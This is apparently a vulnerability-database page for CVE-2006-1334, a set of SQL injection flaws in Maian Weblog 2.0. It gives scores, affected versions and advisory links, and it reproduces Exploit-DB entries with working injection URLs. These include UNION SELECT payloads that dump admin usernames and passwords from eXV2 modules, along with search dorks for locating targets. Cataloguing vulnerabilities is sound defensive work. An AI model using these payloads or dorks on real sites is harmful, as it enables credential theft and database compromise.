CVE-2006-1334
Published: 2006-03-21
Priority: P3, 35, medium
CVSS 2.0: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
EXPLOIT
EPSS: 2.30% (81.2th percentile)
Multiple SQL injection vulnerabilities in Maian Weblog 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) entry and (2) email parameters to (a) print.php and (b) mail.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| maian_script_world | maian_weblog | <= 2.0 | — |
No detection rules found.
Exploit-DB
eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1407 eXV2 Module WebChat 1.60 - 'roomid' SQL Injection
---
##########################################
#
# Powered by eXV2 WebChat 1.60 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORKS 1 : allinurl :"modules/WebChat"
#
###########################################
EXPLOIT 1 :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
WebChat 1.60
Submit date: 2006/6/13
Homepage: www.exv2.de
Version : 1.60
Downloads : 561
Filesize : 79.76 KB
Supported platforms : eXV2
#################################
Exploit-DB
eXV2 Module MyAnnonces - 'lid' SQL Injection
exploitdb·2008-03-14
CVE-2008-1406 eXV2 Module MyAnnonces - 'lid' SQL Injection
---
##########################################
#
# Powered by eXV2 MyAnnonces 1.8 SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : [email protected]
#
###########################################
#
# DORK 1 : eXV2 MyAnnonces
#
###########################################
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3a,1/**/from/**/exv2_users/*where%20exv2_admin%201
###########################################
Category: eXV2 - Module
myannonces 1.8
Submit date; 2006/4/10
Version : 1.8
###########################################
################
Exploit-DB
Maian Weblog 2.0 - 'mail.php' SQL Injection
exploitdb·2006-03-27
CVE-2006-1334 Maian Weblog 2.0 - 'mail.php' SQL Injection
---
source: https://www.securityfocus.com/bid/17247/info
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
http://www.example.com/mail.php? cmd=remove&email=111' or 1/*
Exploit-DB
Maian Weblog 2.0 - 'print.php' SQL Injection
exploitdb·2006-03-27
CVE-2006-1334 Maian Weblog 2.0 - 'print.php' SQL Injection
---
source: https://www.securityfocus.com/bid/17247/info
Maian Weblog is prone to multiple SQL-injection vulnerabilities. The application fails to properly sanitize user-supplied input before using it in SQL queries.
This will allow an attacker to inject arbitrary SQL logic into the vulnerable parameters and scripts. As a result, the attacker may be able to access or modify sensitive information, compromise the application, or even compromise the underlying database. Other attacks are possible.
http://www.example.com/print.php?cmd=log&entry=999'% 20union%20select% 201,2,3,4,5, 6/*
No writeups or analysis indexed.
http://evuln.com/vulns/101/summary.html
http://secunia.com/advisories/19273
http://securityreason.com/securityalert/638
http://securitytracker.com/id?1015818
http://www.osvdb.org/23945
http://www.osvdb.org/23946
http://www.securityfocus.com/archive/1/428903/100/0/threaded
http://www.securityfocus.com/bid/17159
http://www.securityfocus.com/bid/17247
http://www.vupen.com/english/advisories/2006/0994
https://exchange.xforce.ibmcloud.com/vulnerabilities/25295